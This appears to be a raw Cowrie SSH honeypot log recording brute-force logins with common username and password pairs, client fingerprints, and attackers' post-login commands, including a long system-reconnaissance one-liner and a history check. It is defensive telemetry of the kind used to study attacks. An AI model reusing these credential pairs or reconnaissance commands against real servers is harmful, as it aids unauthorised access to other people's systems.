{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-31T05:03:03.202428Z","src_ip":"212.227.125.160","session":"ba9b03cb417b"}
{"eventid":"cowrie.login.success","username":"root","password":"welcome","message":"login attempt [root/welcome] succeeded","sensor":"my-vps","timestamp":"2025-08-31T05:03:05.754019Z","src_ip":"212.227.125.160","session":"ba9b03cb417b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T05:03:06.835247Z","src_ip":"212.227.125.160","session":"ba9b03cb417b"}
{"eventid":"cowrie.command.input","input":"uname=$(uname -s -v -n -m 2>/dev/null);; \t\tarch=$(uname -m 2>/dev/null);; \t\tuptime=$(awk '{u=int($1);d=int(u/86400);h=int((u%86400)/3600);m=int((u%3600)/60);s=\"\";if(d>0)s=s d\"d\";if(h>0){if(s!=\"\")s=s\", \";s=s h\"h\"}if(m>0||s==\"\"){if(s!=\"\")s=s\", \";s=s m\"m\"}print s}' /proc/uptime 2>/dev/null);; \t\t[ -z \"$uptime\" ] && secondsStr=$(cat /proc/uptime | cut -d' ' -f1 | cut -d. -f1) && [ -n \"$secondsStr\" ] && seconds=$((secondsStr)) && d=$((seconds/86400)) && h=$(( (seconds%86400)/3600 )) && m=$(( (seconds%3600)/60 )) && uptime=\"\" && [ $d -gt 0 ] && uptime=\"${uptime}${d}d\" && [ $h -gt 0 ] && { [ -n \"$uptime\" ] && uptime=\"$uptime, \"; uptime=\"${uptime}${h}h\"; } && { [ $m -gt 0 ] || [ -z \"$uptime\" ]; } && { [ -n \"$uptime\" ] && uptime=\"$uptime, \"; uptime=\"${uptime}${m}m\"; };; \t\tcpus=$( (nproc || grep -c \"^processor\" /proc/cpuinfo) 2>/dev/null | head -1);; \t\tcpu_model=$( (grep -m1 \"model name\" /proc/cpuinfo | cut -d: -f2 | sed 's/^ //;s/ *$//' || lscpu | grep -m1 \"Model name\" | cut -d: -f2 | sed 's/^ //;s/ *$//') 2>/dev/null);; \t\tgpu_info=$( (lspci | grep -i vga; lspci | grep -i nvidia) 2>/dev/null | head -n5);; \t\tcat_help=$((cat --help 2>&1 | tr '\\n' ' ') || cat --help 2>&1);; \t\tls_help=$((ls --help 2>&1 | tr '\\n' ' ') || ls --help 2>&1);; \t\tlast_output=$((last | tail -n 10) || last);; \t\techo \"UNAME:$uname\";; \t\techo \"ARCH:$arch\";; \t\techo \"UPTIME:$uptime\";; \t\techo \"CPUS:$cpus\";; \t\techo \"CPU_MODEL:$cpu_model\";; \t\techo \"GPU:$gpu_info\";; \t\techo \"CAT_HELP:$cat_help\";; \t\techo \"LS_HELP:$ls_help\";; \t\techo \"LAST:$last_output\";","message":"CMD: uname=$(uname -s -v -n -m 2>/dev/null);; \t\tarch=$(uname -m 2>/dev/null);; \t\tuptime=$(awk '{u=int($1);d=int(u/86400);h=int((u%86400)/3600);m=int((u%3600)/60);s=\"\";if(d>0)s=s d\"d\";if(h>0){if(s!=\"\")s=s\", \";s=s h\"h\"}if(m>0||s==\"\"){if(s!=\"\")s=s\", \";s=s m\"m\"}print s}' /proc/uptime 2>/dev/null);; \t\t[ -z \"$uptime\" ] && secondsStr=$(cat /proc/uptime | cut -d' ' -f1 | cut -d. -f1) && [ -n \"$secondsStr\" ] && seconds=$((secondsStr)) && d=$((seconds/86400)) && h=$(( (seconds%86400)/3600 )) && m=$(( (seconds%3600)/60 )) && uptime=\"\" && [ $d -gt 0 ] && uptime=\"${uptime}${d}d\" && [ $h -gt 0 ] && { [ -n \"$uptime\" ] && uptime=\"$uptime, \"; uptime=\"${uptime}${h}h\"; } && { [ $m -gt 0 ] || [ -z \"$uptime\" ]; } && { [ -n \"$uptime\" ] && uptime=\"$uptime, \"; uptime=\"${uptime}${m}m\"; };; \t\tcpus=$( (nproc || grep -c \"^processor\" /proc/cpuinfo) 2>/dev/null | head -1);; \t\tcpu_model=$( (grep -m1 \"model name\" /proc/cpuinfo | cut -d: -f2 | sed 's/^ //;s/ *$//' || lscpu | grep -m1 \"Model name\" | cut -d: -f2 | sed 's/^ //;s/ *$//') 2>/dev/null);; \t\tgpu_info=$( (lspci | grep -i vga; lspci | grep -i nvidia) 2>/dev/null | head -n5);; \t\tcat_help=$((cat --help 2>&1 | tr '\\n' ' ') || cat --help 2>&1);; \t\tls_help=$((ls --help 2>&1 | tr '\\n' ' ') || ls --help 2>&1);; \t\tlast_output=$((last | tail -n 10) || last);; \t\techo \"UNAME:$uname\";; \t\techo \"ARCH:$arch\";; \t\techo \"UPTIME:$uptime\";; \t\techo \"CPUS:$cpus\";; \t\techo \"CPU_MODEL:$cpu_model\";; \t\techo \"GPU:$gpu_info\";; \t\techo \"CAT_HELP:$cat_help\";; \t\techo \"LS_HELP:$ls_help\";; \t\techo \"LAST:$last_output\";","sensor":"my-vps","timestamp":"2025-08-31T05:03:06.836051Z","src_ip":"212.227.125.160","session":"ba9b03cb417b"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -m 2 > /dev/null","message":"CMD: uname -s -v -n -m 2 > /dev/null","sensor":"my-vps","timestamp":"2025-08-31T05:03:06.836751Z","src_ip":"212.227.125.160","session":"ba9b03cb417b"}
{"eventid":"cowrie.command.input","input":"uname -m 2 > /dev/null","message":"CMD: uname -m 2 > /dev/null","sensor":"my-vps","timestamp":"2025-08-31T05:03:06.838395Z","src_ip":"212.227.125.160","session":"ba9b03cb417b"}
{"eventid":"cowrie.command.input","input":"awk {u=int($1","message":"CMD: awk {u=int($1","sensor":"my-vps","timestamp":"2025-08-31T05:03:06.839879Z","src_ip":"212.227.125.160","session":"ba9b03cb417b"}
{"eventid":"cowrie.command.input","input":"cat /proc/uptime | cut -d -f1 | cut -d. -f1","message":"CMD: cat /proc/uptime | cut -d -f1 | cut -d. -f1","sensor":"my-vps","timestamp":"2025-08-31T05:03:06.841010Z","src_ip":"212.227.125.160","session":"ba9b03cb417b"}
{"eventid":"cowrie.command.failed","input":"cat /proc/uptime | cut -d -f1 | cut -d. -f1","message":"Command not found: cat /proc/uptime | cut -d -f1 | cut -d. -f1","sensor":"my-vps","timestamp":"2025-08-31T05:03:06.842132Z","src_ip":"212.227.125.160","session":"ba9b03cb417b"}
{"eventid":"cowrie.command.input","input":"(secondsStr","message":"CMD: (secondsStr","sensor":"my-vps","timestamp":"2025-08-31T05:03:06.843568Z","src_ip":"212.227.125.160","session":"ba9b03cb417b"}
{"eventid":"cowrie.command.input","input":"(seconds/86400","message":"CMD: (seconds/86400","sensor":"my-vps","timestamp":"2025-08-31T05:03:06.844349Z","src_ip":"212.227.125.160","session":"ba9b03cb417b"}
{"eventid":"cowrie.command.input","input":"( (seconds%86400","message":"CMD: ( (seconds%86400","sensor":"my-vps","timestamp":"2025-08-31T05:03:06.845376Z","src_ip":"212.227.125.160","session":"ba9b03cb417b"}
{"eventid":"cowrie.command.input","input":"(seconds%86400","message":"CMD: (seconds%86400","sensor":"my-vps","timestamp":"2025-08-31T05:03:06.846126Z","src_ip":"212.227.125.160","session":"ba9b03cb417b"}
{"eventid":"cowrie.command.input","input":"( (seconds%3600","message":"CMD: ( (seconds%3600","sensor":"my-vps","timestamp":"2025-08-31T05:03:06.846974Z","src_ip":"212.227.125.160","session":"ba9b03cb417b"}
{"eventid":"cowrie.command.input","input":"(seconds%3600","message":"CMD: (seconds%3600","sensor":"my-vps","timestamp":"2025-08-31T05:03:06.847647Z","src_ip":"212.227.125.160","session":"ba9b03cb417b"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/1b20a210fe96e5a8abc347dfb91d7befecb4b5f9b7ed40d856410fac15952057","shasum":"1b20a210fe96e5a8abc347dfb91d7befecb4b5f9b7ed40d856410fac15952057","destfile":"/dev/null","message":"Saved redir contents with SHA-256 1b20a210fe96e5a8abc347dfb91d7befecb4b5f9b7ed40d856410fac15952057 to var/lib/cowrie/downloads/1b20a210fe96e5a8abc347dfb91d7befecb4b5f9b7ed40d856410fac15952057","sensor":"my-vps","timestamp":"2025-08-31T05:03:07.418567Z","src_ip":"212.227.125.160","session":"ba9b03cb417b"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/ca88d8e2c0cfe079cce0e55390ff79932c81d831016d8b2dfa21f7db9a052f8c","size":74,"shasum":"ca88d8e2c0cfe079cce0e55390ff79932c81d831016d8b2dfa21f7db9a052f8c","duplicate":true,"duration":"0.6","message":"Closing TTY Log: var/lib/cowrie/tty/ca88d8e2c0cfe079cce0e55390ff79932c81d831016d8b2dfa21f7db9a052f8c after 0.6 seconds","sensor":"my-vps","timestamp":"2025-08-31T05:03:07.419842Z","src_ip":"212.227.125.160","session":"ba9b03cb417b"}
{"eventid":"cowrie.session.closed","duration":"4.7","message":"Connection lost after 4.7 seconds","sensor":"my-vps","timestamp":"2025-08-31T05:03:07.421448Z","src_ip":"212.227.125.160","session":"ba9b03cb417b"}
{"eventid":"cowrie.session.connect","src_ip":"217.72.205.35","src_port":60544,"dst_ip":"1.2.3.4","dst_port":22,"session":"921a2b868ee5","protocol":"ssh","message":"New connection: 217.72.205.35:60544 (1.2.3.4:22) [session: 921a2b868ee5]","sensor":"my-vps","timestamp":"2025-08-31T05:03:10.501111Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-31T05:03:10.502205Z","src_ip":"217.72.205.35","session":"921a2b868ee5"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":54414,"dst_ip":"1.2.3.4","dst_port":22,"session":"248c2d7aa51b","protocol":"ssh","message":"New connection: 212.227.235.229:54414 (1.2.3.4:22) [session: 248c2d7aa51b]","sensor":"my-vps","timestamp":"2025-08-31T05:03:13.878767Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T05:03:13.886758Z","src_ip":"212.227.235.229","session":"248c2d7aa51b"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T05:03:14.008519Z","src_ip":"212.227.235.229","session":"248c2d7aa51b"}
{"eventid":"cowrie.login.failed","username":"jenkins","password":"qwerty@123","message":"login attempt [jenkins/qwerty@123] failed","sensor":"my-vps","timestamp":"2025-08-31T05:03:14.505669Z","src_ip":"212.227.235.229","session":"248c2d7aa51b"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T05:03:14.953981Z","src_ip":"212.227.235.229","session":"a6f10da7f858"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T05:03:14.954823Z","src_ip":"212.227.235.229","session":"a6f10da7f858"}
{"eventid":"cowrie.session.closed","duration":"1.8","message":"Connection lost after 1.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T05:03:15.633500Z","src_ip":"212.227.235.229","session":"248c2d7aa51b"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":34526,"dst_ip":"1.2.3.4","dst_port":22,"session":"704390fc785d","protocol":"ssh","message":"New connection: 212.227.235.229:34526 (1.2.3.4:22) [session: 704390fc785d]","sensor":"my-vps","timestamp":"2025-08-31T05:03:17.038235Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T05:03:17.039208Z","src_ip":"212.227.235.229","session":"704390fc785d"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T05:03:17.296505Z","src_ip":"212.227.235.229","session":"704390fc785d"}
{"eventid":"cowrie.login.failed","username":"clamav","password":"qwerty","message":"login attempt [clamav/qwerty] failed","sensor":"my-vps","timestamp":"2025-08-31T05:03:18.357441Z","src_ip":"212.227.235.229","session":"704390fc785d"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":54432,"dst_ip":"1.2.3.4","dst_port":22,"session":"4c3bdfd56d11","protocol":"ssh","message":"New connection: 212.227.125.160:54432 (1.2.3.4:22) [session: 4c3bdfd56d11]","sensor":"my-vps","timestamp":"2025-08-31T05:03:18.703234Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T05:03:19.456427Z","src_ip":"212.227.125.160","session":"4c3bdfd56d11"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T05:03:19.457108Z","src_ip":"212.227.125.160","session":"4c3bdfd56d11"}
{"eventid":"cowrie.session.closed","duration":"2.6","message":"Connection lost after 2.6 seconds","sensor":"my-vps","timestamp":"2025-08-31T05:03:19.614440Z","src_ip":"212.227.235.229","session":"704390fc785d"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T05:03:24.842423Z","src_ip":"212.227.125.160","session":"d66fab5c0710"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -r -m","message":"CMD: uname -s -v -n -r -m","sensor":"my-vps","timestamp":"2025-08-31T05:03:24.843277Z","src_ip":"212.227.125.160","session":"d66fab5c0710"}
{"eventid":"cowrie.session.closed","duration":"70.0","message":"Connection lost after 70.0 seconds","sensor":"my-vps","timestamp":"2025-08-31T05:03:24.915381Z","src_ip":"212.227.235.229","session":"1a3b0c1921e5"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":52848,"dst_ip":"1.2.3.4","dst_port":22,"session":"fb0ecb513870","protocol":"ssh","message":"New connection: 212.227.125.160:52848 (1.2.3.4:22) [session: fb0ecb513870]","sensor":"my-vps","timestamp":"2025-08-31T05:03:25.782026Z"}
{"eventid":"cowrie.login.success","username":"root","password":"Mcjr","message":"login attempt [root/Mcjr] succeeded","sensor":"my-vps","timestamp":"2025-08-31T05:03:26.022126Z","src_ip":"212.227.125.160","session":"4c3bdfd56d11"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T05:03:29.140578Z","src_ip":"212.227.125.160","session":"4c3bdfd56d11"}
{"eventid":"cowrie.command.input","input":"history | tail -5","message":"CMD: history | tail -5","sensor":"my-vps","timestamp":"2025-08-31T05:03:29.141318Z","src_ip":"212.227.125.160","session":"4c3bdfd56d11"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/3b6409aecd4af0f82f5af0e783a29453ca4bca7e2fda26224a53d480b46ae991","size":28,"shasum":"3b6409aecd4af0f82f5af0e783a29453ca4bca7e2fda26224a53d480b46ae991","duplicate":true,"duration":"1.4","message":"Closing TTY Log: var/lib/cowrie/tty/3b6409aecd4af0f82f5af0e783a29453ca4bca7e2fda26224a53d480b46ae991 after 1.4 seconds","sensor":"my-vps","timestamp":"2025-08-31T05:03:30.518104Z","src_ip":"212.227.125.160","session":"4c3bdfd56d11"}
{"eventid":"cowrie.session.closed","duration":"11.8","message":"Connection lost after 11.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T05:03:30.519299Z","src_ip":"212.227.125.160","session":"4c3bdfd56d11"}
{"eventid":"cowrie.session.connect","src_ip":"201.148.180.50","src_port":45992,"dst_ip":"1.2.3.4","dst_port":22,"session":"bdd0607f0aae","protocol":"ssh","message":"New connection: 201.148.180.50:45992 (1.2.3.4:22) [session: bdd0607f0aae]","sensor":"my-vps","timestamp":"2025-08-31T05:03:38.654376Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T05:03:39.502378Z","src_ip":"201.148.180.50","session":"bdd0607f0aae"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T05:03:39.503684Z","src_ip":"201.148.180.50","session":"bdd0607f0aae"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":60242,"dst_ip":"1.2.3.4","dst_port":22,"session":"a554abc6be9a","protocol":"ssh","message":"New connection: 212.227.235.229:60242 (1.2.3.4:22) [session: a554abc6be9a]","sensor":"my-vps","timestamp":"2025-08-31T05:03:41.379031Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T05:03:42.600660Z","src_ip":"212.227.235.229","session":"a554abc6be9a"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-31T05:03:42.601679Z","src_ip":"212.227.235.229","session":"a554abc6be9a"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":47446,"dst_ip":"1.2.3.4","dst_port":22,"session":"d975de675602","protocol":"ssh","message":"New connection: 212.227.235.229:47446 (1.2.3.4:22) [session: d975de675602]","sensor":"my-vps","timestamp":"2025-08-31T05:03:42.700683Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T05:03:42.707599Z","src_ip":"212.227.235.229","session":"d975de675602"}
